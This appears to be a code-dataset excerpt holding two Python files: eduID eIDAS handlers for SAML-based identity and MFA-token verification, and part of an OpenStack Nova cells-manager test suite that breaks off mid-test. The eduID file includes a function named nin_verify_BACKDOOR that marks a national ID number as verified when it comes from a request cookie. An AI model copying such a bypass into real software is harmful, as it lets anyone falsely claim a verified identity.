gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
# -*- coding: utf-8 -*-
import base64
from enum import Enum, unique
from typing import Any, Mapping
from flask import redirect, request
from six.moves.urllib_parse import urlsplit, urlunsplit
from werkzeug.wrappers import Response as WerkzeugResponse
from eduid_common.api.decorators import require_user
from eduid_common.api.exceptions import AmTaskFailed, MsgTaskFailed
from eduid_common.api.helpers import verify_nin_for_user
from eduid_common.api.messages import CommonMsg, redirect_with_msg
from eduid_common.api.utils import save_and_sync_user, urlappend, verify_relay_state
from eduid_common.authn.acs_registry import acs_action
from eduid_common.authn.eduid_saml2 import get_authn_ctx
from eduid_common.authn.utils import get_saml_attribute
from eduid_common.session import session
# TODO: Import FidoCredential in eduid_userdb.credential.__init__
from eduid_userdb import User
from eduid_userdb.credentials.fido import FidoCredential
from eduid_userdb.logs import MFATokenProofing, SwedenConnectProofing
from eduid_userdb.proofing.state import NinProofingElement, NinProofingState
from eduid_userdb.proofing.user import ProofingUser
from eduid_webapp.eidas.app import current_eidas_app as current_app
from eduid_webapp.eidas.helpers import EidasMsg, is_required_loa, is_valid_reauthn
__author__ = 'lundberg'
@unique
class EidasAcsAction(Enum):
    """Assertion Consumer Service actions dispatched via ``acs_action`` in this module."""

    token_verify = 'token-verify-action'  # verify a FIDO token (token_verify_action)
    nin_verify = 'nin-verify-action'  # verify the user's NIN (nin_verify_action)
    mfa_authn = 'mfa-authentication-action'  # eIDAS as MFA factor (mfa_authentication_action)
@acs_action(EidasAcsAction.token_verify)
@require_user
def token_verify_action(session_info: Mapping[str, Any], user: User) -> WerkzeugResponse:
    """
    Use a Sweden Connect federation IdP assertion to verify a users MFA token and, if necessary,
    the users identity.

    :param session_info: the SAML session info
    :param user: Central db user
    :return: redirect response
    """
    redirect_url = current_app.conf.token_verify_redirect_url

    # The assertion must carry the required level of assurance and must be a
    # recent (re-)authentication; otherwise redirect back with an error message.
    if not is_required_loa(session_info, 'loa3'):
        return redirect_with_msg(redirect_url, EidasMsg.authn_context_mismatch)

    if not is_valid_reauthn(session_info):
        return redirect_with_msg(redirect_url, EidasMsg.reauthn_expired)

    proofing_user = ProofingUser.from_user(user, current_app.private_userdb)
    # The credential id was stashed in the session by the view that started this flow.
    # NOTE(review): find() presumably returns a falsy value if the credential is
    # gone, in which case the .key access below would raise — confirm upstream.
    token_to_verify = proofing_user.credentials.filter(FidoCredential).find(
        session['verify_token_action_credential_id']
    )

    # Check (again) if token was used to authenticate this session
    if token_to_verify.key not in session['eduidIdPCredentialsUsed']:
        return redirect_with_msg(redirect_url, EidasMsg.token_not_in_creds)

    # Verify asserted NIN for user if there are no verified NIN
    if proofing_user.nins.verified.count == 0:
        nin_verify_action(session_info)
        # nin_verify_action saved the user, so re-load user, proofing_user and
        # the credential to avoid clobbering that change below.
        user = current_app.central_userdb.get_user_by_eppn(user.eppn)
        proofing_user = ProofingUser.from_user(user, current_app.private_userdb)
        token_to_verify = proofing_user.credentials.filter(FidoCredential).find(
            session['verify_token_action_credential_id']
        )

    # Check that a verified NIN is equal to the asserted attribute personalIdentityNumber
    _nin_list = get_saml_attribute(session_info, 'personalIdentityNumber')
    if _nin_list is None:
        raise ValueError("Missing PIN in SAML session info")
    asserted_nin = _nin_list[0]
    user_nin = proofing_user.nins.verified.find(asserted_nin)
    if not user_nin:
        current_app.logger.error('Asserted NIN not matching user verified nins')
        current_app.logger.debug('Asserted NIN: {}'.format(asserted_nin))
        return redirect_with_msg(redirect_url, EidasMsg.nin_not_matching)

    # Create a proofing log
    issuer = session_info['issuer']
    current_app.logger.debug('Issuer: {}'.format(issuer))
    authn_context = get_authn_ctx(session_info)
    current_app.logger.debug('Authn context: {}'.format(authn_context))

    try:
        # Navet lookup: the registered postal address becomes part of the proofing evidence.
        user_address = current_app.msg_relay.get_postal_address(user_nin.number)
    except MsgTaskFailed as e:
        current_app.logger.error('Navet lookup failed: {}'.format(e))
        current_app.stats.count('navet_error')
        return redirect_with_msg(redirect_url, CommonMsg.navet_error)

    proofing_log_entry = MFATokenProofing(
        eppn=proofing_user.eppn,
        created_by='eduid-eidas',
        nin=user_nin.number,
        issuer=issuer,
        authn_context_class=authn_context,
        key_id=token_to_verify.key,
        user_postal_address=user_address,
        proofing_version='2018v1',
    )

    # Set token as verified
    token_to_verify.is_verified = True
    token_to_verify.proofing_method = 'SWAMID_AL2_MFA_HI'
    token_to_verify.proofing_version = '2018v1'

    # Save proofing log entry and save user
    # NOTE(review): if the proofing log save returns falsy, the user is not saved
    # but the success redirect below is still returned — confirm this is intended.
    if current_app.proofing_log.save(proofing_log_entry):
        current_app.logger.info('Recorded MFA token verification in the proofing log')
        try:
            save_and_sync_user(proofing_user)
        except AmTaskFailed as e:
            current_app.logger.error('Verifying token for user failed')
            current_app.logger.error('{}'.format(e))
            return redirect_with_msg(redirect_url, CommonMsg.temp_problem)
        current_app.stats.count(name='fido_token_verified')

    return redirect_with_msg(redirect_url, EidasMsg.verify_success, error=False)
@acs_action(EidasAcsAction.nin_verify)
@require_user
def nin_verify_action(session_info: Mapping[str, Any], user: User) -> WerkzeugResponse:
    """
    Use a Sweden Connect federation IdP assertion to verify a users identity.

    :param session_info: the SAML session info
    :param user: Central db user
    :return: redirect response
    """
    redirect_url = current_app.conf.nin_verify_redirect_url

    # The assertion must carry the required level of assurance and must be a
    # recent (re-)authentication; otherwise redirect back with an error message.
    if not is_required_loa(session_info, 'loa3'):
        return redirect_with_msg(redirect_url, EidasMsg.authn_context_mismatch)

    if not is_valid_reauthn(session_info):
        return redirect_with_msg(redirect_url, EidasMsg.reauthn_expired)

    proofing_user = ProofingUser.from_user(user, current_app.private_userdb)

    # The asserted NIN arrives as the personalIdentityNumber SAML attribute.
    _nin_list = get_saml_attribute(session_info, 'personalIdentityNumber')
    if _nin_list is None:
        raise ValueError("Missing PIN in SAML session info")
    asserted_nin = _nin_list[0]

    # A user with an already-verified NIN cannot verify another one here.
    if proofing_user.nins.verified.count != 0:
        current_app.logger.error('User already has a verified NIN')
        current_app.logger.debug(
            'Primary NIN: {}. Asserted NIN: {}'.format(proofing_user.nins.primary.number, asserted_nin)
        )
        return redirect_with_msg(redirect_url, EidasMsg.nin_already_verified)

    # Create a proofing log
    issuer = session_info['issuer']
    authn_context = get_authn_ctx(session_info)
    try:
        # Navet lookup: the registered postal address becomes part of the proofing evidence.
        user_address = current_app.msg_relay.get_postal_address(asserted_nin)
    except MsgTaskFailed as e:
        current_app.logger.error('Navet lookup failed: {}'.format(e))
        current_app.stats.count('navet_error')
        return redirect_with_msg(redirect_url, CommonMsg.navet_error)

    proofing_log_entry = SwedenConnectProofing(
        eppn=proofing_user.eppn,
        created_by='eduid-eidas',
        nin=asserted_nin,
        issuer=issuer,
        authn_context_class=authn_context,
        user_postal_address=user_address,
        proofing_version='2018v1',
    )

    # Verify NIN for user
    try:
        nin_element = NinProofingElement(number=asserted_nin, created_by='eduid-eidas', is_verified=False)
        proofing_state = NinProofingState(id=None, modified_ts=None, eppn=user.eppn, nin=nin_element)
        if not verify_nin_for_user(user, proofing_state, proofing_log_entry):
            current_app.logger.error(f'Failed verifying NIN for user {user}')
            return redirect_with_msg(redirect_url, CommonMsg.temp_problem)
    except AmTaskFailed:
        current_app.logger.exception('Verifying NIN for user failed')
        return redirect_with_msg(redirect_url, CommonMsg.temp_problem)

    current_app.stats.count(name='nin_verified')
    return redirect_with_msg(redirect_url, EidasMsg.nin_verify_success, error=False)
@require_user
def nin_verify_BACKDOOR(user: User) -> WerkzeugResponse:
    """
    Mock using a Sweden Connect federation IdP assertion to verify a users identity
    when the request carries a magic cookie.

    The NIN to "verify" is read from a ``nin`` request cookie; issuer, authn
    context and postal address are hard-coded test fixtures.

    :param user: Central db user
    :return: redirect response
    """
    redirect_url = current_app.conf.nin_verify_redirect_url
    proofing_user = ProofingUser.from_user(user, current_app.private_userdb)

    asserted_nin = request.cookies.get('nin')
    if asserted_nin is None:
        raise RuntimeError("No backdoor without a NIN in a cookie")

    # Same guard as the real flow: only one verified NIN per user.
    if proofing_user.nins.verified.count != 0:
        current_app.logger.error('User already has a verified NIN')
        current_app.logger.debug(
            'Primary NIN: {}. Asserted NIN: {}'.format(proofing_user.nins.primary.number, asserted_nin)
        )
        return redirect_with_msg(redirect_url, ':ERROR:eidas.nin_already_verified')

    # Create a proofing log (fixture values instead of a real Navet lookup)
    issuer = 'https://idp.example.com/simplesaml/saml2/idp/metadata.php'
    authn_context = 'http://id.elegnamnden.se/loa/1.0/loa3'
    user_address = {
        'Name': {'GivenNameMarking': '20', 'GivenName': 'Magic Cookie', 'Surname': 'Testsson'},
        'OfficialAddress': {'Address2': 'MAGIC COOKIE', 'PostalCode': '12345', 'City': 'LANDET'},
    }

    proofing_log_entry = SwedenConnectProofing(
        eppn=proofing_user.eppn,
        created_by='eduid-eidas',
        nin=asserted_nin,
        issuer=issuer,
        authn_context_class=authn_context,
        user_postal_address=user_address,
        proofing_version='2018v1',
    )

    # Verify NIN for user
    try:
        nin_element = NinProofingElement(number=asserted_nin, created_by='eduid-eidas', is_verified=False)
        proofing_state = NinProofingState(id=None, modified_ts=None, eppn=user.eppn, nin=nin_element)
        if not verify_nin_for_user(user, proofing_state, proofing_log_entry):
            current_app.logger.error(f'Failed verifying NIN for user {user}')
            return redirect_with_msg(redirect_url, ':ERROR:Temporary technical problems')
    except AmTaskFailed:
        current_app.logger.exception('Verifying NIN for user failed')
        return redirect_with_msg(redirect_url, ':ERROR:Temporary technical problems')

    current_app.stats.count(name='nin_verified')
    return redirect_with_msg(redirect_url, 'eidas.nin_verify_success')
@acs_action(EidasAcsAction.mfa_authn)
@require_user
def mfa_authentication_action(session_info: Mapping[str, Any], user: User) -> WerkzeugResponse:
    """
    Complete an eIDAS MFA authentication: check the assertion against the user's
    verified NIN and, on success, mark ``session.mfa_action`` as successful before
    redirecting back to the caller's redirect-action view.

    :param session_info: the SAML session info
    :param user: Central db user
    :return: redirect response
    """
    relay_state = request.form.get('RelayState')
    current_app.logger.debug('RelayState: {}'.format(relay_state))
    redirect_url = None
    if 'eidas_redirect_urls' in session:
        # One-shot lookup: the url is popped so it cannot be replayed.
        redirect_url = session['eidas_redirect_urls'].pop(relay_state, None)
    if not redirect_url:
        # With no redirect url just redirect the user to dashboard for a new try to log in
        # TODO: This will result in a error 400 until we put the authentication in the session
        current_app.logger.error('Missing redirect url for mfa authentication')
        return redirect_with_msg(current_app.conf.action_url, EidasMsg.no_redirect_url)

    # We get the mfa authentication views "next" argument as base64 to avoid our
    # request sanitation rewriting the '&' characters in the url
    redirect_url = base64.b64decode(redirect_url).decode('utf-8')
    # TODO: Rename verify_relay_state to verify_redirect_url
    redirect_url = verify_relay_state(redirect_url)

    if not is_required_loa(session_info, 'loa3'):
        return redirect_with_msg(redirect_url, EidasMsg.authn_context_mismatch)

    if not is_valid_reauthn(session_info):
        return redirect_with_msg(redirect_url, EidasMsg.reauthn_expired)

    # Check that a verified NIN is equal to the asserted attribute personalIdentityNumber
    _personal_idns = get_saml_attribute(session_info, 'personalIdentityNumber')
    if _personal_idns is None:
        current_app.logger.error(
            'Got no personalIdentityNumber attributes. pysaml2 without the right attribute_converter?'
        )
        # TODO: change to reasonable redirect_with_msg when the ENUM work for that is merged
        raise RuntimeError('Got no personalIdentityNumber')

    asserted_nin = _personal_idns[0]
    user_nin = user.nins.verified.find(asserted_nin)
    if not user_nin:
        current_app.logger.error('Asserted NIN not matching user verified nins')
        current_app.logger.debug('Asserted NIN: {}'.format(asserted_nin))
        current_app.stats.count(name='mfa_auth_nin_not_matching')
        return redirect_with_msg(redirect_url, EidasMsg.nin_not_matching)

    if session.mfa_action is None:
        # TODO: change to reasonable redirect_with_msg? This should not happen...
        raise RuntimeError('No MFA info in the session')

    # Record the successful MFA authentication details for the waiting action.
    session.mfa_action.success = True
    session.mfa_action.issuer = session_info['issuer']
    # authn_info is assumed shaped [(class_ref, authorities, instant)] — instant at index 2.
    session.mfa_action.authn_instant = session_info['authn_info'][0][2]
    session.mfa_action.authn_context = get_authn_ctx(session_info)

    current_app.stats.count(name='mfa_auth_success')
    current_app.stats.count(name=f'mfa_auth_{session_info["issuer"]}_success')

    # Redirect back to action app but to the redirect-action view
    resp = redirect_with_msg(redirect_url, EidasMsg.action_completed, error=False)
    parsed_url = urlsplit(str(resp.location))
    new_path = urlappend(str(parsed_url.path), 'redirect-action')
    parsed_url = parsed_url._replace(path=new_path)
    new_url = urlunsplit(parsed_url)
    current_app.logger.debug(f'Redirecting to: {new_url}')
    return redirect(new_url)
| |
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For CellsManager
"""
import copy
import datetime
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from six.moves import range
from nova.cells import messaging
from nova.cells import utils as cells_utils
from nova import context
from nova import objects
from nova import test
from nova.tests.unit.cells import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit import fake_server_actions
from nova.tests.unit.objects import test_flavor
CONF = cfg.CONF
CONF.import_opt('compute_topic', 'nova.compute.rpcapi')

# Canned fixture rows handed back by the fake cells in the tests below.
FAKE_COMPUTE_NODES = [dict(id=1, host='host1'), dict(id=2, host='host2')]
FAKE_SERVICES = [dict(id=1, host='host1'),
                 dict(id=2, host='host2'),
                 dict(id=3, host='host3')]
FAKE_TASK_LOGS = [dict(id=1, host='host1'),
                  dict(id=2, host='host2')]
class CellsManagerClassTestCase(test.NoDBTestCase):
"""Test case for CellsManager class."""
def setUp(self):
    """Build a fake cells manager rooted at a grandchild cell."""
    super(CellsManagerClassTestCase, self).setUp()
    fakes.init(self)
    # pick a child cell to use for tests.
    self.our_cell = 'grandchild-cell1'
    self.cells_manager = fakes.get_cells_manager(self.our_cell)
    self.msg_runner = self.cells_manager.msg_runner
    self.state_manager = fakes.get_state_manager(self.our_cell)
    self.driver = self.cells_manager.driver
    self.ctxt = 'fake_context'
def _get_fake_response(self, raw_response=None, exc=False):
    """Return a canned messaging.Response; a failure response when exc is set."""
    if exc:
        # Failure response: wraps a test exception and flags the error bit.
        return messaging.Response(self.ctxt, 'fake',
                                  test.TestingException(), True)
    payload = 'fake-response' if raw_response is None else raw_response
    return messaging.Response(self.ctxt, 'fake', payload, False)
def test_get_cell_info_for_neighbors(self):
    """Manager delegates neighbor info lookup to the state manager."""
    self.mox.StubOutWithMock(self.cells_manager.state_manager,
                             'get_cell_info_for_neighbors')
    self.cells_manager.state_manager.get_cell_info_for_neighbors()
    self.mox.ReplayAll()
    self.cells_manager.get_cell_info_for_neighbors(self.ctxt)
def test_post_start_hook_child_cell(self):
    """A leaf cell starts servers and tells its parents about itself."""
    self.mox.StubOutWithMock(self.driver, 'start_servers')
    self.mox.StubOutWithMock(context, 'get_admin_context')
    self.mox.StubOutWithMock(self.cells_manager, '_update_our_parents')
    self.driver.start_servers(self.msg_runner)
    context.get_admin_context().AndReturn(self.ctxt)
    self.cells_manager._update_our_parents(self.ctxt)
    self.mox.ReplayAll()
    self.cells_manager.post_start_hook()
def test_post_start_hook_middle_cell(self):
    """A middle cell additionally asks its children for capabilities/capacities."""
    cells_manager = fakes.get_cells_manager('child-cell2')
    msg_runner = cells_manager.msg_runner
    driver = cells_manager.driver
    self.mox.StubOutWithMock(driver, 'start_servers')
    self.mox.StubOutWithMock(context, 'get_admin_context')
    self.mox.StubOutWithMock(msg_runner,
                             'ask_children_for_capabilities')
    self.mox.StubOutWithMock(msg_runner,
                             'ask_children_for_capacities')
    driver.start_servers(msg_runner)
    context.get_admin_context().AndReturn(self.ctxt)
    msg_runner.ask_children_for_capabilities(self.ctxt)
    msg_runner.ask_children_for_capacities(self.ctxt)
    self.mox.ReplayAll()
    cells_manager.post_start_hook()
def test_update_our_parents(self):
    """_update_our_parents reports both capabilities and capacities upward."""
    self.mox.StubOutWithMock(self.msg_runner,
                             'tell_parents_our_capabilities')
    self.mox.StubOutWithMock(self.msg_runner,
                             'tell_parents_our_capacities')
    self.msg_runner.tell_parents_our_capabilities(self.ctxt)
    self.msg_runner.tell_parents_our_capacities(self.ctxt)
    self.mox.ReplayAll()
    self.cells_manager._update_our_parents(self.ctxt)
def test_build_instances(self):
    """build_instances forwards kwargs to the msg_runner for our own cell."""
    build_inst_kwargs = {'instances': [objects.Instance(),
                                       objects.Instance()]}
    self.mox.StubOutWithMock(self.msg_runner, 'build_instances')
    our_cell = self.msg_runner.state_manager.get_my_state()
    self.msg_runner.build_instances(self.ctxt, our_cell, build_inst_kwargs)
    self.mox.ReplayAll()
    self.cells_manager.build_instances(self.ctxt,
                                       build_inst_kwargs=build_inst_kwargs)
def test_build_instances_old_flavor(self):
    """A legacy flavor dict is converted to an objects.Flavor before dispatch."""
    flavor_dict = test_flavor.fake_flavor
    args = {'filter_properties': {'instance_type': flavor_dict},
            'instances': [objects.Instance()]}
    with mock.patch.object(self.msg_runner, 'build_instances') as mock_bi:
        self.cells_manager.build_instances(self.ctxt,
                                           build_inst_kwargs=args)
        filter_properties = mock_bi.call_args[0][2]['filter_properties']
        self.assertIsInstance(filter_properties['instance_type'],
                              objects.Flavor)
def test_build_instances_old_instances(self):
    """Legacy db instance dicts are converted to objects.Instance before dispatch."""
    args = {'instances': [fake_instance.fake_db_instance()]}
    with mock.patch.object(self.msg_runner, 'build_instances') as mock_bi:
        self.cells_manager.build_instances(self.ctxt,
                                           build_inst_kwargs=args)
        self.assertIsInstance(mock_bi.call_args[0][2]['instances'][0],
                              objects.Instance)
def test_run_compute_api_method(self):
    # Args should just be silently passed through
    cell_name = 'fake-cell-name'
    method_info = 'fake-method-info'
    self.mox.StubOutWithMock(self.msg_runner,
                             'run_compute_api_method')
    fake_response = self._get_fake_response()
    self.msg_runner.run_compute_api_method(self.ctxt,
                                           cell_name,
                                           method_info,
                                           True).AndReturn(fake_response)
    self.mox.ReplayAll()
    response = self.cells_manager.run_compute_api_method(
        self.ctxt, cell_name=cell_name, method_info=method_info,
        call=True)
    # Manager unwraps the Response and returns the raw value.
    self.assertEqual('fake-response', response)
def test_instance_update_at_top(self):
    """instance_update_at_top is a straight pass-through to the msg_runner."""
    self.mox.StubOutWithMock(self.msg_runner, 'instance_update_at_top')
    self.msg_runner.instance_update_at_top(self.ctxt, 'fake-instance')
    self.mox.ReplayAll()
    self.cells_manager.instance_update_at_top(self.ctxt,
                                              instance='fake-instance')
def test_instance_destroy_at_top(self):
    """instance_destroy_at_top is a straight pass-through to the msg_runner."""
    self.mox.StubOutWithMock(self.msg_runner, 'instance_destroy_at_top')
    self.msg_runner.instance_destroy_at_top(self.ctxt, 'fake-instance')
    self.mox.ReplayAll()
    self.cells_manager.instance_destroy_at_top(self.ctxt,
                                               instance='fake-instance')
def test_instance_delete_everywhere(self):
    """instance_delete_everywhere passes instance and delete type through."""
    self.mox.StubOutWithMock(self.msg_runner,
                             'instance_delete_everywhere')
    self.msg_runner.instance_delete_everywhere(self.ctxt,
                                               'fake-instance',
                                               'fake-type')
    self.mox.ReplayAll()
    self.cells_manager.instance_delete_everywhere(
        self.ctxt, instance='fake-instance',
        delete_type='fake-type')
def test_instance_fault_create_at_top(self):
    """instance_fault_create_at_top is a straight pass-through."""
    self.mox.StubOutWithMock(self.msg_runner,
                             'instance_fault_create_at_top')
    self.msg_runner.instance_fault_create_at_top(self.ctxt,
                                                 'fake-fault')
    self.mox.ReplayAll()
    self.cells_manager.instance_fault_create_at_top(
        self.ctxt, instance_fault='fake-fault')
def test_bw_usage_update_at_top(self):
    """bw_usage_update_at_top is a straight pass-through."""
    self.mox.StubOutWithMock(self.msg_runner,
                             'bw_usage_update_at_top')
    self.msg_runner.bw_usage_update_at_top(self.ctxt,
                                           'fake-bw-info')
    self.mox.ReplayAll()
    self.cells_manager.bw_usage_update_at_top(
        self.ctxt, bw_update_info='fake-bw-info')
def test_heal_instances(self):
    """_heal_instances syncs instances in batches of 2, resuming on next call."""
    self.flags(instance_updated_at_threshold=1000,
               instance_update_num_instances=2,
               group='cells')

    fake_context = context.RequestContext('fake', 'fake')
    stalled_time = timeutils.utcnow()
    # Instances not updated since (now - threshold) are considered stalled.
    updated_since = stalled_time - datetime.timedelta(seconds=1000)

    def utcnow():
        # Freeze time so updated_since is deterministic across both passes.
        return stalled_time

    call_info = {'get_instances': 0, 'sync_instances': []}

    instances = ['instance1', 'instance2', 'instance3']

    def get_instances_to_sync(context, **kwargs):
        self.assertEqual(context, fake_context)
        call_info['shuffle'] = kwargs.get('shuffle')
        call_info['project_id'] = kwargs.get('project_id')
        call_info['updated_since'] = kwargs.get('updated_since')
        call_info['get_instances'] += 1
        return iter(instances)

    def instance_get_by_uuid(context, uuid):
        # Map 'instanceN' back to its fixture entry by trailing digit.
        return instances[int(uuid[-1]) - 1]

    def sync_instance(context, instance):
        self.assertEqual(context, fake_context)
        call_info['sync_instances'].append(instance)

    self.stubs.Set(cells_utils, 'get_instances_to_sync',
                   get_instances_to_sync)
    self.stubs.Set(self.cells_manager.db, 'instance_get_by_uuid',
                   instance_get_by_uuid)
    self.stubs.Set(self.cells_manager, '_sync_instance',
                   sync_instance)
    self.stubs.Set(timeutils, 'utcnow', utcnow)

    self.cells_manager._heal_instances(fake_context)
    self.assertEqual(call_info['shuffle'], True)
    self.assertIsNone(call_info['project_id'])
    self.assertEqual(call_info['updated_since'], updated_since)
    self.assertEqual(call_info['get_instances'], 1)
    # Only first 2
    self.assertEqual(call_info['sync_instances'],
                     instances[:2])

    call_info['sync_instances'] = []
    self.cells_manager._heal_instances(fake_context)
    self.assertEqual(call_info['shuffle'], True)
    self.assertIsNone(call_info['project_id'])
    self.assertEqual(call_info['updated_since'], updated_since)
    self.assertEqual(call_info['get_instances'], 2)
    # Now the last 1 and the first 1
    self.assertEqual(call_info['sync_instances'],
                     [instances[-1], instances[0]])
def test_sync_instances(self):
    """sync_instances passes project/updated_since/deleted filters through."""
    self.mox.StubOutWithMock(self.msg_runner,
                             'sync_instances')
    self.msg_runner.sync_instances(self.ctxt, 'fake-project',
                                   'fake-time', 'fake-deleted')
    self.mox.ReplayAll()
    self.cells_manager.sync_instances(self.ctxt,
                                      project_id='fake-project',
                                      updated_since='fake-time',
                                      deleted='fake-deleted')
def test_service_get_all(self):
    """Per-cell service lists are flattened into one proxy list, sorted by cell."""
    responses = []
    expected_response = []
    # 3 cells... so 3 responses. Each response is a list of services.
    # Manager should turn these into a single list of responses.
    for i in range(3):
        cell_name = 'path!to!cell%i' % i
        services = []
        for service in FAKE_SERVICES:
            fake_service = objects.Service(**service)
            services.append(fake_service)
            expected_service = cells_utils.ServiceProxy(fake_service,
                                                        cell_name)
            expected_response.append(
                (cell_name, expected_service, fake_service))
        response = messaging.Response(self.ctxt, cell_name, services,
                                      False)
        responses.append(response)
    self.mox.StubOutWithMock(self.msg_runner,
                             'service_get_all')
    self.mox.StubOutWithMock(cells_utils, 'add_cell_to_service')
    self.msg_runner.service_get_all(self.ctxt,
                                    'fake-filters').AndReturn(responses)
    # Calls are done by cells, so we need to sort the list by the cell name
    expected_response.sort(key=lambda k: k[0])
    for cell_name, service_proxy, service in expected_response:
        cells_utils.add_cell_to_service(
            service, cell_name).AndReturn(service_proxy)
    self.mox.ReplayAll()
    response = self.cells_manager.service_get_all(self.ctxt,
                                                  filters='fake-filters')
    self.assertEqual([proxy for cell, proxy, service in expected_response],
                     response)
def test_service_get_by_compute_host(self):
    """A cell!host name is split and the returned service wrapped in a proxy."""
    fake_cell = 'fake-cell'
    fake_service = objects.Service(**FAKE_SERVICES[0])
    fake_response = messaging.Response(self.ctxt, fake_cell,
                                       fake_service,
                                       False)
    expected_response = cells_utils.ServiceProxy(fake_service, fake_cell)
    cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')

    self.mox.StubOutWithMock(self.msg_runner,
                             'service_get_by_compute_host')
    self.mox.StubOutWithMock(cells_utils, 'add_cell_to_service')

    self.msg_runner.service_get_by_compute_host(self.ctxt,
        fake_cell, 'fake-host').AndReturn(fake_response)
    cells_utils.add_cell_to_service(fake_service, fake_cell).AndReturn(
        expected_response)
    self.mox.ReplayAll()

    response = self.cells_manager.service_get_by_compute_host(self.ctxt,
        host_name=cell_and_host)
    self.assertEqual(expected_response, response)
def test_get_host_uptime(self):
    """get_host_uptime routes to the named cell and unwraps the uptime string."""
    fake_cell = 'parent!fake-cell'
    fake_host = 'fake-host'
    fake_cell_and_host = cells_utils.cell_with_item(fake_cell, fake_host)
    host_uptime = (" 08:32:11 up 93 days, 18:25, 12 users,  load average:"
                   " 0.20, 0.12, 0.14")
    fake_response = messaging.Response(self.ctxt, fake_cell, host_uptime,
                                       False)

    self.mox.StubOutWithMock(self.msg_runner,
                             'get_host_uptime')

    self.msg_runner.get_host_uptime(self.ctxt, fake_cell, fake_host).\
        AndReturn(fake_response)
    self.mox.ReplayAll()

    response = self.cells_manager.get_host_uptime(self.ctxt,
                                                  fake_cell_and_host)
    self.assertEqual(host_uptime, response)
def test_service_update(self):
    """service_update routes the update and wraps the result in a ServiceProxy."""
    fake_cell = 'fake-cell'
    fake_service = objects.Service(**FAKE_SERVICES[0])
    fake_response = messaging.Response(
        self.ctxt, fake_cell, fake_service, False)
    expected_response = cells_utils.ServiceProxy(fake_service, fake_cell)
    cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')
    params_to_update = {'disabled': True}

    self.mox.StubOutWithMock(self.msg_runner, 'service_update')
    self.mox.StubOutWithMock(cells_utils, 'add_cell_to_service')

    self.msg_runner.service_update(self.ctxt,
        fake_cell, 'fake-host', 'nova-api',
        params_to_update).AndReturn(fake_response)
    cells_utils.add_cell_to_service(fake_service, fake_cell).AndReturn(
        expected_response)
    self.mox.ReplayAll()

    response = self.cells_manager.service_update(
        self.ctxt, host_name=cell_and_host, binary='nova-api',
        params_to_update=params_to_update)
    self.assertEqual(expected_response, response)
def test_service_delete(self):
    """service_delete splits the cell!id name and forwards to the msg_runner."""
    fake_cell = 'fake-cell'
    service_id = '1'
    cell_service_id = cells_utils.cell_with_item(fake_cell, service_id)
    with mock.patch.object(self.msg_runner,
                           'service_delete') as service_delete:
        self.cells_manager.service_delete(self.ctxt, cell_service_id)
    service_delete.assert_called_once_with(
        self.ctxt, fake_cell, service_id)
def test_proxy_rpc_to_manager(self):
    """proxy_rpc_to_manager extracts cell/host from the topic and unwraps the reply."""
    self.mox.StubOutWithMock(self.msg_runner,
                             'proxy_rpc_to_manager')
    fake_response = self._get_fake_response()
    cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')
    topic = "%s.%s" % (CONF.compute_topic, cell_and_host)
    self.msg_runner.proxy_rpc_to_manager(self.ctxt, 'fake-cell',
            'fake-host', topic, 'fake-rpc-msg',
            True, -1).AndReturn(fake_response)
    self.mox.ReplayAll()
    response = self.cells_manager.proxy_rpc_to_manager(self.ctxt,
            topic=topic, rpc_message='fake-rpc-msg', call=True,
            timeout=-1)
    self.assertEqual('fake-response', response)
def _build_task_log_responses(self, num):
    """Build `num` per-cell task-log Responses plus the flattened expected list."""
    responses = []
    expected_response = []
    # 3 cells... so 3 responses.  Each response is a list of task log
    # entries. Manager should turn these into a single list of
    # task log entries.
    for i in range(num):
        cell_name = 'path!to!cell%i' % i
        task_logs = []
        for task_log in FAKE_TASK_LOGS:
            task_logs.append(copy.deepcopy(task_log))
            expected_task_log = copy.deepcopy(task_log)
            cells_utils.add_cell_to_task_log(expected_task_log,
                                             cell_name)
            expected_response.append(expected_task_log)
        response = messaging.Response(self.ctxt, cell_name, task_logs,
                                      False)
        responses.append(response)
    return expected_response, responses
def test_task_log_get_all(self):
    """With no host filter, all cells are queried and results flattened."""
    expected_response, responses = self._build_task_log_responses(3)
    self.mox.StubOutWithMock(self.msg_runner,
                             'task_log_get_all')
    self.msg_runner.task_log_get_all(self.ctxt, None,
            'fake-name', 'fake-begin',
            'fake-end', host=None, state=None).AndReturn(responses)
    self.mox.ReplayAll()
    response = self.cells_manager.task_log_get_all(self.ctxt,
            task_name='fake-name',
            period_beginning='fake-begin', period_ending='fake-end')
    self.assertEqual(expected_response, response)
def test_task_log_get_all_with_filters(self):
    """A cell!host filter is split into per-cell and per-host arguments."""
    expected_response, responses = self._build_task_log_responses(1)
    cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')
    self.mox.StubOutWithMock(self.msg_runner,
                             'task_log_get_all')
    self.msg_runner.task_log_get_all(self.ctxt, 'fake-cell',
            'fake-name', 'fake-begin', 'fake-end', host='fake-host',
            state='fake-state').AndReturn(responses)
    self.mox.ReplayAll()
    response = self.cells_manager.task_log_get_all(self.ctxt,
            task_name='fake-name',
            period_beginning='fake-begin', period_ending='fake-end',
            host=cell_and_host, state='fake-state')
    self.assertEqual(expected_response, response)
def test_task_log_get_all_with_cell_but_no_host_filters(self):
    """A filter naming only a cell passes host=None to that cell."""
    expected_response, responses = self._build_task_log_responses(1)
    # Host filter only has cell name.
    cell_and_host = 'fake-cell'
    self.mox.StubOutWithMock(self.msg_runner,
                             'task_log_get_all')
    self.msg_runner.task_log_get_all(self.ctxt, 'fake-cell',
            'fake-name', 'fake-begin', 'fake-end', host=None,
            state='fake-state').AndReturn(responses)
    self.mox.ReplayAll()
    response = self.cells_manager.task_log_get_all(self.ctxt,
            task_name='fake-name',
            period_beginning='fake-begin', period_ending='fake-end',
            host=cell_and_host, state='fake-state')
